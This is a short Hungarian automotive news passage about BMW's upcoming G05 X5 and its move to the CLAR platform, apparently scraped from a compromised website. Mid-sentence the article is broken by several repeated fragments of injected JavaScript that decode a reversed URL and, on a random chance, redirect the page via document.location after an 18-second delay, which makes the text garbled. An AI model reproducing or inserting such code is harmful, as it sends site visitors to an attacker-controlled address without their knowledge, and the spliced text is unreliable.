A jelenleg futó X5 még csak 5 éve van a piacon, de úgy tűnik, hogy a németek ezúttal nem várják ki a megszokott 6-7 éves ciklust, ami abból a szempontból sem meglepő, hogy a méretes SUV esetében elmaradt a szokásos nagyobb frissítés is – persze azért folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan megkapta az új technológiákat és hajtásláncokat. Az új generáció ráadásul már a BMW új CLAR platformjára épül majd, ami valószínűleg nagyban hozzájárult ahhoz, hogy hamarabb érkezik a G05 kódot kapó X5 – a bajorok szerették volna minél hamarabb véghez vinni az átállást az új padlólemezre. A kémfotók alapján egyébként jóval nagyobb és hangsúlyosabb „vesékre”, illetve…
- Hirdetés -